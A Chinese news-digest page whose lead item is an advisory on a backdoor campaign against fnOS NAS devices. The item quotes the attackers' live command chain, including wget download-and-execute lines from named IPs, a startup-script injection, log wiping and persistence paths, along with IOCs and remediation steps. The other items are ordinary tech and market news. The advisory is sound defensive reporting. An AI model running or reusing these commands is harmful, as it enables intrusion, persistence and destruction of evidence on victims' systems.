Skip to main content

LoopDNS资讯播报

LoopDNS 综合资讯---简洁,及时,快速,准确


频道: @DNSPODT

电报讨论组: @LoopDNS

撤稿流程: https://t.me/loopdns/107752
  1. 重要/漏洞:飞牛 fnOS 疑似遭公网未授权访问/利用后植入后门组件

    漏洞编号:暂无(官方未公开 / 未分配 CVE)
    重要等级:严重(高危)
    CVSS 分数:暂无

    影响范围:
    fnOS 设备存在公网可达入口(端口映射/反代/直连公网)时风险显著上升;官方建议升级至 1.1.15 并验证关闭公网映射后异常是否停止。
    论坛反馈即使仅使用 HTTPS 访问也可能出现同类驻留现象,说明风险不应仅限定为 HTTP 明文通道(可能存在其他公网暴露面、历史入侵残留或服务端漏洞可经 HTTPS 触发)

    受影响系统:
    fnOS(版本范围未公开)。官方社区回复称该问题官方已知,建议升级至 1.1.15,并在关闭公网端口映射后验证异常上传/连接是否停止。

    木马行为分析
    目前LoopDNS频道编辑已获取相关木马文件,下为行为分析

    1. 入侵者在通过未公开入口/利用链投放后门下载器后并执行
    下载二阶段载荷并执行(观测到的命令链)
    cd /tmp
    wget http://20.89.168.131/nginx
    chmod 777 nginx
    head -c 16 /dev/urandom >> nginx(向文件追加随机字节,改变哈希,规避基于哈希的检测)
    ./nginx
    wget http://20.89.168.131/trim_https_cgi
    chmod 777 trim_https_cgi
    head -c 16 /dev/urandom >> trim_https_cgi
    ./trim_https_cgi
    外联与拉取补充组件
    HTTP:GET http://151.240.13.91/trim_fnos
    TCP:连接 45.95.212.102:6608


    2.后门驻留组件 gots

    A1. 写入后门主体与持久化文件
    创建/写入:/sbin/gots
    创建/写入:/etc/rc.local、/etc/rc.d/rc.local
    创建/写入 systemd 服务(变种服务名):
    /etc/systemd/system/x86.service
    /etc/systemd/system/<sha256>.service
    执行持久化:systemctl enable <service>.service(含重定向到 /dev/null 的静默执行)
    自身复制/改名落地:
    /usr/bin/x86(样本发生目录重命名/落地)
    /usr/bin/<sha256>(样本发生目录重命名/落地)


    A2. C2 通信与探测
    DNS:解析 aura.kabot.icu -> 45.95.212.102
    TCP:连接 45.95.212.102 多端口(观测到:3489、5098、6608、7489)
    论坛样本显示的附加行为(strings/排查结论)
    干扰系统工具:重命名/替换 cat(出现 mv /usr/bin/cat /usr/bin/cat2 等字符串,导致“cat 丢失”现象)
    结束系统进程:pkill -f 'network_service|resmon_service'
    修改持久化入口:改写 /etc/rc.local 与 /etc/systemd/system/%s.service 并 systemctl enable
    外联:包含 45.95.212.102 字符串并进行访问


    3. 组件 trim_https_cgi

    清理痕迹
    清空多目录日志:/var/log/*、/usr/trim/logs/*、/run/log/journal 等
    删除审计日志:/var/log/audit/audit.log 及滚动文件
    删除/清理安全相关日志:/var/log/secure*、/var/log/messages*、wtmp/btmp/lastlog 等

    干扰业务与恢复功能
    结束服务:pkill -f backup_service、pkill -f sysrestore_service 等

    二阶段下载执行与启动脚本注入
    修改 /usr/trim/bin/system_startup.sh,追加下载执行链:
    wget http://151.240.13.91/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp
    端口相关痕迹与疑似隐藏监听(来源于论坛排查)
    目标系统存在 0.0.0.0:57132 LISTEN,ss/netstat 无 PID,lsof/fuser 无结果
    trim_https_cgi 字符串包含 57132,并出现 kill -9 $(lsof -t -i:57132) 之类处理逻辑(提示该端口为其链路的一部分)


    4.内核模块 snd_pcap(论坛排查)
    /etc/modules 被追加 snd_pcap
    模块文件:/lib/modules/6.12.18-trim/snd_pcap.ko
    与“57132 监听无 PID/无 lsof 结果”的现象存在关联怀疑(疑似内核层隐藏/驻留能力)


    关键落地痕迹
    不可变属性(immutable,需先 chattr -i 才能删除):

    /usr/bin/nginx
    /usr/sbin/gots
    /usr/trim/bin/trim_https_cgi
    /etc/systemd/system/nginx.service
    /etc/systemd/system/trim_https_cgi.service
    /etc/rc.local

    伪装/复用:/usr/bin/nginx 与 /usr/sbin/gots md5 相同(同一载荷多名称投放)
    rc.local 自启:/sbin/gots x86 &
    systemd 自启(示例):ExecStart=/usr/bin/nginx x86(oneshot + enable)


    可疑网络基础设施(IOC)
    IP:45[.]95[.]212[.]102(C2/多端口连接)
    IP:151[.]240[.]13[.]91(HTTP 拉取二阶段:/trim_fnos、论坛样本)
    域名:aura[.]kabot[.]icu(解析到 45[.]95[.]212[.]102)
    下载源:20[.]89[.]168[.]131(HTTP 拉取:/nginx、/trim_https_cgi)
    归属信息:45[.]95[.]212[.]102 与 151[.]240[.]13[.]91 两个 IP 均归属 AS209554 ISIF OU 提供商网段


    处置建议
    1. 关闭公网端口映射/源站直通。
    2. 升级 fnOS 至官方建议版本(1.1.15 或更高)。
    3. 出口防火墙封禁:45.95.212.102、151.240.13.91,同时监控连接数与上传是否回落。
    4. 轮换所有管理口令/密钥;检查容器、计划任务、数据盘是否存在触发残留(官方提示“重装后仍可能再次触发”)。

    参考来源:飞牛社区
  2. @fxtrader The Chinese government floods X search results with porn whenever there is political unrest—to prevent their citizens from finding out real-time information.

    This has been a difficult problem to solve but we are aware & working on it. origin source
  3. Google Genie 3世界模型开始向美国Google AI Ultra用户开放体验

    2026年1月29日,Google在官方博客宣布推出Project Genie(实验性研究原型),并称已开始在美国向Google AI Ultra订阅用户(18岁以上)逐步开放访问,用于创建、探索并混搭重制交互式世界。

    此次开放的主要是Google Labs里的Project Genie网页原型(体验入口)Project Genie由Genie 3驱动,并结合Nano Banana Pro与Gemini提供生成与交互能力。文字或上传/生成图片“勾勒世界”(可在进入前预览并微调画面,支持第一/第三人称视角等设置)、在世界中实时探索(移动时实时生成前方路径并可调镜头)、以及基于他人作品的提示词进行“重制/再创作”,并可下载探索视频。

    生成世界可能不够逼真或不完全符合提示词/物理规律;角色控制可能出现延迟;单次生成/体验时长目前限制为60秒;此外,Genie 3在2025年8月公布的一些能力(例如可用文本触发的世界事件)尚未被纳入Project Genie原型。
    google blog
  4. Google DeepMind 发布 AlphaGenome

    2026年1月28日,Google DeepMind 在《Nature》发表论文《Advancing regulatory variant effect prediction with AlphaGenome》(DOI:10.1038/s41586-025-10014-0),并在官方博客更新中给出模型获取入口与代码资源;AlphaGenome 早在2025年6月25日已通过非商业研究用途的API提供预览访问。

    AlphaGenome 的核心定位是统一的DNA序列模型:输入最长可达100万碱基对(1 Mb)的DNA序列,在单碱基分辨率下输出上千条功能基因组预测轨迹,并可通过对比突变序列与参考序列的预测差异,对变异影响进行评分。

    论文摘要列出的预测模态覆盖基因表达、转录起始、染色质可及性、组蛋白修饰、转录因子结合、染色质接触图谱,以及剪接位点使用与剪接连接(splice junction)坐标/强度等;作者称其目标是缓解既有方法在长序列上下文与高分辨率预测之间的取舍。

    开放与使用方式方面,DeepMind 在 GitHub 发布了配套研究代码(含JAX实现与API实现),代码采用 Apache-2.0 许可;预训练权重可在 Kaggle 或 Hugging Face 下载,但需接受非商业模型条款。仓库同时提示本地运行对算力要求较高(例如建议使用H100级别GPU)。

    在评测结果上,论文报告:在变异效应预测的26项评估中,AlphaGenome 有25项达到或超过“最强外部模型”的表现;并展示了其在TAL1致癌基因附近的临床相关变异机制复现能力。训练数据方面,DeepMind 表示模型使用了多个公共联盟数据资源(包括 ENCODE、GTEx、4D Nucleome、FANTOM5 等),覆盖人类与小鼠多种细胞类型/组织的调控相关测量信号;其应用重点指向占基因组大部分的非编码调控区域(常被描述为约98%)。

    外部反馈与限制方面,多位专家在 Science Media Centre 的评论中强调:模型在若干任务上表现突出,但细胞类型特异性调控仍是挑战,且目前并不适合直接用于临床患者决策;媒体报道也提示其仍需要实验验证、并受训练物种范围等因素限制。

    STAT 报道称,AlphaGenome 自2025年6月上线预览以来,已有接近3000名来自160个国家的科研人员通过API进行非商业研究使用,API日调用量约100万次(DeepMind在发布会上对媒体披露)。

    Google Deepmind
  5. Qwen 开源 Qwen3-ASR 与 Qwen3-ForcedAligner

    Qwen 团队在 2026 年 1 月 29 日宣布开源 Qwen3-ASR 系列(1.7B、0.6B)及 Qwen3-ForcedAligner-0.6B,并在 GitHub 提供代码与推理/部署示例;模型权重同步发布到 Hugging Face/ModelScope,项目采用 Apache-2.0 许可证。

    Qwen3-ASR 将语种识别与 ASR 合并为单模型“all-in-one”流程:官方说明其覆盖 52 个语种与方言,其中包括 30 种语言与 22 种中文口音/方言;推理侧同时支持离线与流式,并面向语音、歌唱及带 BGM 的歌声等音频类型。

    配套的 Qwen3-ForcedAligner-0.6B 采用非自回归(NAR)时间戳预测方式,用于文本-语音对的强制对齐;官方给出的语种覆盖为 11 种语言,并宣称其时间戳精度在评测中优于多种主流强制对齐方案。效率指标方面,技术报告给出的示例为:Qwen3-ASR-0.6B 在 128 并发下可实现“1 秒转写 2000 秒语音”,平均首 Token 延迟(TTFT)最低 92ms;同时报告与仓库将 1.7B 版本描述为开源模型中的 SOTA,并称其可对标最强商业 API(均为自述评测结论)。

    工具链方面,仓库提供 qwen-asr PyPI 包(Transformers 与 vLLM 两种后端)、本地 Gradio Web UI 与浏览器麦克风流式 Demo、以及 Docker 镜像与 vLLM 服务化命令封装,目标是覆盖批处理、高并发与在线服务场景。


    huggingface
  6. 竹新社
    台湾,教育部常务次长朱俊彰1月30日表示,抖音、小红书、微信、微博、百度云盘等App已被数发部认定有信息安全风险,且危害儿少身心健康。除数发部已采取的禁止校园公务设备下载使用、中小学TANet阻断上述服务的措施外,教育部所属机关学校iTaiwan无线网也将阻断上述服务。 目前,台湾中小学TANet的过滤机制均为DNS阻断,用户在浏览器设置DoH即会失效。去年12月警方在全台阻断小红书域名解析,也仅影响了其网页加载,App仍可照常使用。 (中华民国教育部)
    台湾,教育部常务次长朱俊彰1月30日表示,抖音、小红书、微信、微博、百度云盘等App已被数发部认定有信息安全风险,且危害儿少身心健康。除数发部已采取的禁止校园公务设备下载使用、中小学TANet阻断上述服务的措施外,教育部所属机关学校iTaiwan无线网也将阻断上述服务。
    目前,台湾中小学TANet的过滤机制均为DNS阻断,用户在浏览器设置DoH即会失效。去年12月警方在全台阻断小红书域名解析,也仅影响了其网页加载,App仍可照常使用。
  7. 预测市场Polymarket最新显示,沃什被特朗普提名为美联储新主席的概率飙升至95%。

    沃什长期以偏鹰派立场著称,这一预期迅速推升美元和美债收益率,并对商品价格形成压制。内外盘期货普遍下行,贵金属成为跌幅最为集中的品种。

    沃什曾在近期的一场深度访谈中直言,通胀是美联储的责任,不能归咎于外界因素。他给出的改革方案并非推倒重来,而是主张美联储需要"复兴"而非"革命"。针对高利率困境,沃什认为,可以通过缩表换取低利率空间。"如果我们让印钞机安静一点,利率其实可以更低。"

    wallstreetcn.com/articles/3761461
  8. LoopDNS资讯播报
    GitHub热门B站API bilibili-API-collect 项目收到律师函后宣布永久关停 1月28日,GitHub 仓库 SocialSisterYi/bilibili-API-collect(哔哩哔哩 API 收集整理)维护者在 README 中公告称:已收到“B站委托的律师事务所”发出的律师函警告邮件,指控该项目对哔哩哔哩平台“非公开 API 接口及其调用逻辑、参数结构、访问控制及安全认证机制”进行系统性收集整理并向公众传播,构成侵权;仓库即日起停止维护并删除相关文档及源代码。 GitHub…
    后续:BiliBili法务部门要求彻底清除GitHub项目历史记录

    在1月28日宣布永久关停后,GitHub上的bilibili-API-collect项目继续受到B站法务部门的关注。根据1月30日发出的律师函,B站指出尽管项目已归档为只读状态,但通过代码变更历史(diff)等方式,侵权内容仍可能被恢复。法务部门要求项目方彻底删除所有相关代码及历史记录,确保无法恢复。若未能满足此要求,B站将继续采取法律措施。
  9. 巴拿马最高法院宣布,长江和记实业子公司和记港口持有的巴拿马运河两端主要港口(巴尔博亚港和克里斯托瓦尔港)的特许权违宪。

    巴拿马审计长诉讼指控政府审计存在违规行为。

    法院声明称,裁决经过“广泛的审议和讨论”。巴拿马将对上述港口进行招标。

    长和股价一度跌超5%。

    来源:FT
  10. 监管通报某基金公司违规销售:责令改正并暂停新发 追究总经理等相关负责人责任

    近日监管发布机构监管通报称,某基金公司管理的基金产品单日申购量超百亿,涉嫌违规销售,经核查,基金公司与不具备基金销售业务资格和基金从业资格的互联网“大V”开展营销合作,向其支付大额广告费,以互联网“大V”在平台上预告某日(将)大额购入D基金公司的A产品为噱头,利用互联网“大V”的流量和影响力鼓动投资者跟进购买A产品,诱导风险承受能力不匹配的投资者购买中高风险产品。经查,公司未对投资者充分揭示风险,投资者适当性管理不到位,违法相关法律法规,监管对该公司采取责令改正并暂停受理公募基金产品注册的监管措施,同步追究公司总经理、督察长、互联网业务部门负责人等责任人员责任。
  11. 闪迪:我们正与 NV­I­D­IA 及其客户沟通配置问题。目前这一需求还没计入我们的预测中。初步预估,到2027年这可能带来额外 75-100 EB 的需求,次年可能翻倍。这再次证明 NA­ND 在 AI 架构中的核心地位。
  12. 23:23财联社1月29日电,正在交易中的沪金、沪银期货夜盘出现短时大幅跳水行情,一度分别下探6%、4%。
  13. 产业发展,总书记强调不能喜新厌旧

    在省部级主要领导干部学习贯彻党的二十届四中全会精神专题研讨班开班式上,习近平强调,产业发展不能一哄而上、跟风冒进,更不能喜新厌旧、把传统产业优势丢掉。

    在2025年底召开的中央经济工作会议上,习近平指出:“一些地方不顾实际,盲目追风口。看别人搞芯片,自己也搞。看别人搞‘新三样’,自己也不甘落后。”针对一些现象,总书记打了个形象的比方,“生物有多样性,地区有差异性,有老年人,有青年人,有的年幼有的年长,为什么都选择干一样的活呢?”